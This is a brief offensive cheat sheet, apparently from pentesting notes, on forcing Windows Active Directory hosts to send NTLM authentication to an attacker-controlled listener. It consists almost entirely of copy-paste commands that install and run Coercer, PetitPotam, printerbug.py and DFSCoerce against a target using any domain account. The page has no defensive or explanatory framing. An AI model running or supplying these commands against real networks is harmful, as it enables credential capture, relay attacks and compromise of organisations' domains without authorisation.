NTLM Coercion

Coerce NTLM authentication from hosts using any Active Directory account

Define Shell Variables

TARGET='<TARGET IP/FQDN>'
LISTENER='<YOUR IP/FQDN>'
ADUSER='<AD USERNAME>'
ADDOMAIN='<AD DOMAIN>'

Coercer (Perfered)

pipx install git+https://github.com/p0dalirius/Coercer.git
source ~/.zshrc

# Scan for Coercion
coercer scan -t $TARGET -u $ADUSER -d $ADDOMAIN

# Coerce Bruit Force (All Techniques)
coercer coerce -l $LISTENER -t $TARGET -u $ADUSER -d $ADDOMAIN --always-continue

# Coerce HTTL NTLM Auth (WebDAV)
coercer coerce -l $LISTENER -t $TARGET -u $ADUSER -d $ADDOMAIN --auth-type http

PetitPotam

cd tools
git clone https://github.com/topotam/PetitPotam.git
cd PetitPotam
chmod +x PetitPotam.py
python3 PetitPotam.py $LISTENER $TARGET -u $ADUSER -d $ADDOMAIN

PrinterBug

cd tools
git clone https://github.com/dirkjanm/krbrelayx
cd krbrelayx
python3 printerbug.py $ADDOMAIN/$ADUSER@$TARGET $LISTENER

DFSCoerce

cd tools
git clone https://github.com/Wh04m1001/DFSCoerce.git
cd DFSCoerce
python3 dfscoerce.py $LISTENER $TARGET -u $ADUSER -d $ADDOMAIN

Last updated